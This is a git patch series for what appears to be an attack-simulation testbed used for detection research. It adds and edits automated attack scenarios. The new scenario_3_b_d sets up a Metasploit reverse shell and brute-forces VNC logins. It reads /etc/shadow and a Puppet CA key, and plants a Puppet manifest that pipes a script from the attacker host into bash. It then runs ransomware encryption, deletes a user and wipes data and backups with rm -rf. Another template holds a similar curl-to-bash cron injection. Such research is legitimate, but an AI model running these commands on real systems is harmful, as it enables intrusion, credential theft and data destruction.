From 74e47f81bd0902c99af9f23d9e6a7e95baebc2b2 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Fri, 12 Dec 2025 13:28:26 +0100 Subject: [PATCH 1/8] fix ssh command via admin server --- ansible/run/scenario3/main.yml | 76 ++++++++++++++++++- .../run/scenario3/templates/scenario_3_a_c.j2 | 20 ++--- 2 files changed, 77 insertions(+), 19 deletions(-) diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 0c7dedb9..db317c0d 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -39,16 +39,84 @@ - attackmate - playbooks - - name: Ensure delay before commands - ansible.builtin.replace: + - name: Add cmd_config block to end of /etc/attackmate.yml + ansible.builtin.blockinfile: path: /etc/attackmate.yml - regexp: 'command_delay: 0' - replace: 'command_delay: 15' + block: | + cmd_config: + command_delay: 15 + create: true # Creates the file if it doesn't exist backup: yes + insertafter: EOF + marker: "# {mark} ANSIBLE MANAGED BLOCK FOR CMD_CONFIG" become: true tags: - playbooks + +# this is the key needed for scenario a_c when mgmt is used as jump host + - name: Generate SSH key pair for attacker to access mgmt + ansible.builtin.openssh_keypair: + path: "{{ user_home.stdout }}/.ssh/attacker_mgmt" + type: rsa + size: 4096 + owner: "{{ attacker_user }}" + group: "{{ attacker_user }}" + mode: '0600' + tags: + - ssh + - playbooks + + - name: Read SSH public key from attacker + become: yes + ansible.builtin.slurp: + src: "{{ user_home.stdout }}/.ssh/attacker_mgmt.pub" + register: ssh_key_mgmt + tags: + - ssh + - playbooks + + - name: Add public key to mgmt's authorized_keys + become: yes + ansible.builtin.authorized_key: + user: aecid + state: present + key: "{{ ssh_key_mgmt.content | b64decode }}" + delegate_to: mgmt + tags: + - ssh + - playbooks + + - name: Set attacker_mgmt_public_key as a fact + ansible.builtin.set_fact: + attacker_mgmt_public_key: "{{ ssh_key_mgmt.content | b64decode }}" + tags: + - ssh + - playbooks + +- name: add ssh key to adminpc2 + hosts: adminpc2 + become: true + tasks: + - name: Add public key to adminpcs's authorized_keys + become: yes + ansible.builtin.authorized_key: + user: aecid + state: present + key: "{{ hostvars['attacker']['attacker_mgmt_public_key'] }}" + tags: + - ssh + - playbooks + +- name: Install Attacker Host Part 2 + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + delay_before_attack: 600 + tasks: + - name: Copy user-password-combo ansible.builtin.copy: src: user_pass_combo.txt diff --git a/ansible/run/scenario3/templates/scenario_3_a_c.j2 b/ansible/run/scenario3/templates/scenario_3_a_c.j2 index 49dfffd1..b0306939 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_c.j2 @@ -7,7 +7,8 @@ vars: $SERVER_ADDRESS: fw.attackbed.com $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 - $ADMIN_SERVER: 10.12.0.222 + $ADMIN_SERVER: 10.12.0.223 + $MGMT_IP: 192.42.0.201 commands: - type: shell @@ -256,11 +257,6 @@ commands: cmd: "cd /var/www/html/debian/\n" interactive: True -# - type: ssh -# session: foothold -# cmd: "rm healthcheckd_1.0-1_amd64.deb\n" -# interactive: True - - type: ssh session: foothold cmd: "dpkg-scanpackages . | gzip -c9 > Packages.gz\n" @@ -270,15 +266,9 @@ commands: tactics: "Execution,Lateral Movement" technique_name: "Software Deployment Tools" - - - type: ssh - cmd: echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@192.168.100.23 \"apt update && apt install -y healthcheckd\"" | at now + 2 minute - hostname: $ADMIN_SERVER - username: aecid - password: aecid - jmp_hostname: 192.42.2.42 - clear_cache: True - exit_on_error: False + # connect via jumphost to admin host, that ssh to linuxshare + - type: shell + cmd: ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o "ProxyCommand=ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -W %h:%p aecid@$MGMT_IP" aecid@10.12.0.223 'echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@192.168.100.23 '\''apt update && apt install -y healthcheckd'\''" | at now + 2 minute' metadata: delayed_manifestation: "120s" From 3e23687ad35f4d948dd4f21a87e6bf8a7253cab5 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Fri, 12 Dec 2025 13:29:25 +0100 Subject: [PATCH 2/8] version unattended upgrades in testbed repo --- packer/linuxshare/playbook/requirements.yml | 2 +- packer/repository/playbook/requirements.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/packer/linuxshare/playbook/requirements.yml b/packer/linuxshare/playbook/requirements.yml index 25511438..c8d9f7b4 100644 --- a/packer/linuxshare/playbook/requirements.yml +++ b/packer/linuxshare/playbook/requirements.yml @@ -1,6 +1,6 @@ roles: - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git - version: v1.0.0 + version: v0.0.0 name: manage_unattended_upgrades - src: https://github.com/ait-testbed/ansible-auditd.git version: v1.1 diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 043de313..21861879 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -1,6 +1,6 @@ roles: - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git - version: v1.0.0 + version: v0.0.0 name: manage_unattended_upgrades - src: https://github.com/ait-testbed/ansible-auditd.git version: v1.1 From 443c3a6757f7ad1e42a03b019f225767bd249166 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:09:20 +0100 Subject: [PATCH 3/8] add sceanrio d_a tag to playbook scenario1 --- ansible/run/scenario1/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ansible/run/scenario1/main.yml b/ansible/run/scenario1/main.yml index bfac156f..de8f29f8 100644 --- a/ansible/run/scenario1/main.yml +++ b/ansible/run/scenario1/main.yml @@ -156,6 +156,7 @@ owner: "root" mode: "0755" tags: + - scenario_1_d_a - scenario_1_e_a - scenario_1_c_a From 8fcf4494eee1801c206b15118082f51ca8ddd790 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:12:59 +0100 Subject: [PATCH 4/8] add action metadata, use correct session in 3_b_d --- .gitignore | 2 + .../run/scenario3/templates/scenario_3_b_a.j2 | 13 +- .../run/scenario3/templates/scenario_3_b_b.j2 | 12 +- .../run/scenario3/templates/scenario_3_b_d.j2 | 351 ++++++++++++++++++ 4 files changed, 376 insertions(+), 2 deletions(-) create mode 100644 ansible/run/scenario3/templates/scenario_3_b_d.j2 diff --git a/.gitignore b/.gitignore index b9c32140..939fa14e 100644 --- a/.gitignore +++ b/.gitignore @@ -2,6 +2,7 @@ roles/ venv/ .venv/ .venv/* +ansible/.venv* .env .terragrunt-cache/ .terraform.lock.hcl @@ -10,6 +11,7 @@ docs/build/ *.qcow2 .mypy_cache/ *.tfstate +*tar.gz # temporary packer-key(debug) os_builder.pem diff --git a/ansible/run/scenario3/templates/scenario_3_b_a.j2 b/ansible/run/scenario3/templates/scenario_3_b_a.j2 index b8850519..7d20ca84 100644 --- a/ansible/run/scenario3/templates/scenario_3_b_a.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b_a.j2 @@ -5,7 +5,7 @@ #################### # for vnc connection to the display, tunnel with : ssh -J aecid@ -L 5901:172.17.100.122:5901 aecid@172.17.100.122 -# then vncviewer localhost:5091 +# then vncviewer localhost:5901 vars: $SERVER_ADDRESS: fw.attackbed.com @@ -87,6 +87,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "terminal" - type: sleep seconds: 3 @@ -107,6 +108,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "sudo -i" - type: sleep seconds: 3 @@ -124,6 +126,8 @@ commands: session: foothold cmd: type input: "id" + metadata: + action: "id" - type: sleep seconds: 3 @@ -141,6 +145,8 @@ commands: session: foothold cmd: type input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" - type: sleep seconds: 3 @@ -162,6 +168,8 @@ commands: session: foothold cmd: type input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" - type: sleep seconds: 3 @@ -183,6 +191,8 @@ commands: session: foothold cmd: type input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" - type: sleep seconds: 3 @@ -208,6 +218,7 @@ commands: techniques: "T1105,T1059.004,T1053.003,T1021.005,T1071.001" tactics: "Execution,Defense Evasion,Persistence,Command and Control" technique_name: "Ingress Tool Transfer,Command and Scripting Interpreter: Unix Shell,Scheduled Task/Job: Cron,Remote Services: VNC,Application Layer Protocol: Web Protocols" + action: "echo 'curl http://$ATTACKER_ADDRESS:8888/install.sh | bash' >> /media/share/healthcheck_cron.sh" - type: sleep seconds: 2 diff --git a/ansible/run/scenario3/templates/scenario_3_b_b.j2 b/ansible/run/scenario3/templates/scenario_3_b_b.j2 index 21ffa352..e3fcdd6b 100644 --- a/ansible/run/scenario3/templates/scenario_3_b_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b_b.j2 @@ -88,6 +88,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "terminal" - type: sleep seconds: 3 @@ -108,6 +109,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "sudo -i" - type: sleep seconds: 3 @@ -125,6 +127,8 @@ commands: session: foothold cmd: type input: "id" + metadata: + action: "id" - type: sleep seconds: 3 @@ -142,6 +146,8 @@ commands: session: foothold cmd: type input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" - type: sleep seconds: 3 @@ -163,6 +169,8 @@ commands: session: foothold cmd: type input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" - type: sleep seconds: 3 @@ -184,6 +192,8 @@ commands: session: foothold cmd: type input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" - type: sleep seconds: 3 @@ -198,7 +208,7 @@ commands: technique_name: "Data from Network Shared Drive" - type: sleep - seconds: 2 + seconds: 2 # HERE THE REVERSE SHELL FOR PORTFORWARDING ON THE REPOSERVER IS ESTABLISHED - type: vnc diff --git a/ansible/run/scenario3/templates/scenario_3_b_d.j2 b/ansible/run/scenario3/templates/scenario_3_b_d.j2 new file mode 100644 index 00000000..ac823fec --- /dev/null +++ b/ansible/run/scenario3/templates/scenario_3_b_d.j2 @@ -0,0 +1,351 @@ +#################### +# +# Scenario 3 b d +# +#################### + +# for vnc connection to the display, tunnel with : ssh -J aecid@ -L 5901:172.17.100.122:5901 aecid@172.17.100.122 +# then vncviewer localhost:5901 + +vars: + $SERVER_ADDRESS: fw.attackbed.com + $ATTACKER_ADDRESS: 192.42.1.174 + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + +commands: + +### PREPARE THE REVERSE SHELL FOR THE REPOSERVER + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +### BRUTEFORCE VNC + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + metadata: + techniques: "T1110.001,T1021.005" + tactics: "Credential Access, Lateral Movement" + technique_name: "Brute Force: Password Guessing,Remote Services: VNC" + + - type: vnc + session: foothold + cmd: click + metadata: + techniques: "T1021.005" + tactics: "Lateral Movement" + technique_name: "Remote Services: VNC" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "terminal" + metadata: + techniques: "T1021.005" + tactics: "Lateral Movement" + technique_name: "Remote Services: VNC" + action: "terminal" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "sudo -i" + metadata: + techniques: "T1078.003" + tactics: "Privilege Escalation" + technique_name: "Valid Accounts: Local Accounts" + action: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: vnc + session: foothold + cmd: type + input: "sudo -i" + metadata: + techniques: "T1078.003" + tactics: "Privilege Escalation" + technique_name: "Valid Accounts: Local Accounts" + action: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + +#id + - type: vnc + session: foothold + cmd: type + input: "id" + metadata: + action: "id" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + +#cat etc/shadow + - type: vnc + session: foothold + cmd: type + input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1003.008" + tactics: "Credential Access" + technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow" + + - type: sleep + seconds: 2 + +#cat certificates + - type: vnc + session: foothold + cmd: type + input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1213" + tactics: "Collection" + technique_name: "Data from Information Repositories" + + - type: sleep + seconds: 2 + +#cat healthcheck cron + - type: vnc + session: foothold + cmd: type + input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1039" + tactics: "Collection" + technique_name: "Data from Network Shared Drive" + + - type: sleep + seconds: 2 + +# HERE THE LATERAL MOVEMENT TAKES PLACE + + - type: vnc + session: foothold + cmd: type + input: "echo -e \"\\nclass blah2 {\\n exec { \\\"curl http://192.42.1.174:88" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: "88/install.sh | bash\\\":\\n path => ['/usr/bin','/bin']\\n }\\n}\\n\\nnode 'linuxshare.attack" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: "bed.local' {\\n class { 'blah2': }\\n}\\n\" >> /etc/puppetlabs/code/environments/production/manifests/site.pp" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1072,T1105,T1059.004" + tactics: "Execution, Lateral Movement" + technique_name: "Software Deployment Tools,Ingress Tool Transfer,Command and Scripting Interpreter: Unix Shell" + +#################### MOVED ################################ + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + metadata: + techniques: "T1486,T1105" + tactics: "Impact,Command and Control" + technique_name: "Data Encrypted for Impact, Ingress Tool Transfer" + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + metadata: + techniques: "T1486,T1565.001" + tactics: "Impact" + technique_name: "Data Encrypted for Impact, Data Manipulation: Stored Data Manipulation" + + - type: msf-session + session: movement + cmd: find /media/data/Images + metadata: + techniques: "T1018" + tactics: "Discovery" + technique_name: "Remote System Discovery" + + - type: msf-session + session: movement + cmd: cat /etc/passwd + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + - type: msf-session + session: movement + cmd: userdel -f john + metadata: + techniques: "T1531" + tactics: "Impact" + technique_name: "Account Access Removal" + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + metadata: + techniques: "T1485" + tactics: "Impact" + technique_name: "Data Destruction" + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + metadata: + techniques: "T1490" + tactics: "Impact" + technique_name: "Inhibit System Recovery" + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service + metadata: + techniques: "T1489" + tactics: "Impact" + technique_name: "Service Stop" + + - type: sleep + seconds: 30 From 9d0261a9b5946939b20415573bb3f29be3d3a385 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:13:27 +0100 Subject: [PATCH 5/8] correct comand delay scenario4 --- ansible/run/scenario4/main.yml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/ansible/run/scenario4/main.yml b/ansible/run/scenario4/main.yml index effc089d..a59ee3ac 100644 --- a/ansible/run/scenario4/main.yml +++ b/ansible/run/scenario4/main.yml @@ -42,12 +42,16 @@ tags: - playbooks - - name: Ensure delay before commands - ansible.builtin.replace: + - name: Add cmd_config block to end of /etc/attackmate.yml + ansible.builtin.blockinfile: path: /etc/attackmate.yml - regexp: 'command_delay: 0' - replace: 'command_delay: 15' + block: | + cmd_config: + command_delay: 15 + create: true # Creates the file if it doesn't exist backup: yes + insertafter: EOF + marker: "# {mark} ANSIBLE MANAGED BLOCK FOR CMD_CONFIG" become: true tags: - playbooks From 49b9db2c9325023bd9cd3901e77308e937b607c1 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:13:50 +0100 Subject: [PATCH 6/8] add sleeps scenario4 --- ansible/run/scenario4/templates/scenario_4.j2 | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/ansible/run/scenario4/templates/scenario_4.j2 b/ansible/run/scenario4/templates/scenario_4.j2 index b5359dfe..2dae2320 100644 --- a/ansible/run/scenario4/templates/scenario_4.j2 +++ b/ansible/run/scenario4/templates/scenario_4.j2 @@ -41,6 +41,9 @@ commands: tactics: "Initial Access,Lateral Movement,Defense Evasion" technique_name: "Valid Accounts: Local Accounts,Ingress Tool Transfer,Traffic Signaling: Port Knocking" + - type: sleep + seconds: 10 + - type: ssh creates_session: "foothold" username: john @@ -53,6 +56,9 @@ commands: tactics: "Initial Access" technique_name: "Valid Accounts: Local Accounts" + - type: sleep + seconds: 10 + - type: ssh session: foothold cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password john@$FIREWALL_ADDRESS\n" @@ -61,9 +67,9 @@ commands: techniques: "T1078.003" tactics: "Lateral Movement" technique_name: "Valid Accounts: Local Accounts" - + - type: sleep - seconds: 2 + seconds: 10 - type: ssh session: foothold From e8f1876aab63b3728d659945466e2d7dca778368 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:15:25 +0100 Subject: [PATCH 7/8] up filebeat version --- ansible/run/upgrade-attacker/requirements.yml | 2 +- packer/corpdns/playbook/requirements.yml | 2 +- packer/firewall/playbook/requirements.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/run/upgrade-attacker/requirements.yml b/ansible/run/upgrade-attacker/requirements.yml index ed9656b0..e0b259b0 100644 --- a/ansible/run/upgrade-attacker/requirements.yml +++ b/ansible/run/upgrade-attacker/requirements.yml @@ -1,4 +1,4 @@ - - src: https://github.com/ait-cs-IaaS/ansible-mate-desktop.git + - src: https://github.com/ait-testbed/ansible-mate-desktop.git version: v1.2.1 name: mate-desktop - src: https://github.com/ait-testbed/atb-ansible-novnc.git diff --git a/packer/corpdns/playbook/requirements.yml b/packer/corpdns/playbook/requirements.yml index 93c04cbc..2aef9089 100644 --- a/packer/corpdns/playbook/requirements.yml +++ b/packer/corpdns/playbook/requirements.yml @@ -12,7 +12,7 @@ roles: version: v1.0.0 name: aeciduser - src: https://github.com/ait-testbed/atb-ansible-filebeat.git - version: v0.9.2 + version: v0.9.3 name: filebeat - src: https://github.com/ait-testbed/atb-ansible-aecidtools.git version: v1.1.0 diff --git a/packer/firewall/playbook/requirements.yml b/packer/firewall/playbook/requirements.yml index f0bcda16..f5f69f67 100644 --- a/packer/firewall/playbook/requirements.yml +++ b/packer/firewall/playbook/requirements.yml @@ -21,7 +21,7 @@ roles: version: v1.0.3 name: squidproxy - src: https://github.com/ait-testbed/atb-ansible-filebeat.git - version: v0.9.2 + version: v0.9.3 name: filebeat - src: https://github.com/ait-testbed/atb-ansible-aecidtools.git version: v1.1.0 From f93f707673d6092cd01971b0767bbe2a7fe082aa Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:21:37 +0100 Subject: [PATCH 8/8] add comments --- ansible/run/scenario1/templates/scenario_1_c_a.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_c_b.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_c_c.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_d_a.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_e_b.j2 | 2 -- 5 files changed, 20 insertions(+), 2 deletions(-) diff --git a/ansible/run/scenario1/templates/scenario_1_c_a.j2 b/ansible/run/scenario1/templates/scenario_1_c_a.j2 index 9ba50969..edd38efe 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_a.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_a.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_c_b.j2 b/ansible/run/scenario1/templates/scenario_1_c_b.j2 index a7e812df..dded44ff 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_b.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_b.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_c_c.j2 b/ansible/run/scenario1/templates/scenario_1_c_c.j2 index c20c5496..c43e1254 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_c.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_c.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_d_a.j2 b/ansible/run/scenario1/templates/scenario_1_d_a.j2 index dcb58efa..43ebb761 100644 --- a/ansible/run/scenario1/templates/scenario_1_d_a.j2 +++ b/ansible/run/scenario1/templates/scenario_1_d_a.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_e_b.j2 b/ansible/run/scenario1/templates/scenario_1_e_b.j2 index 74a50ce2..842c65a1 100644 --- a/ansible/run/scenario1/templates/scenario_1_e_b.j2 +++ b/ansible/run/scenario1/templates/scenario_1_e_b.j2 @@ -8,8 +8,6 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 - $MGMT_IP: 192.42.0.201 - $MGMT_USERNAME: aecid $DOMAIN: attackbed.com $USER: aecid $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt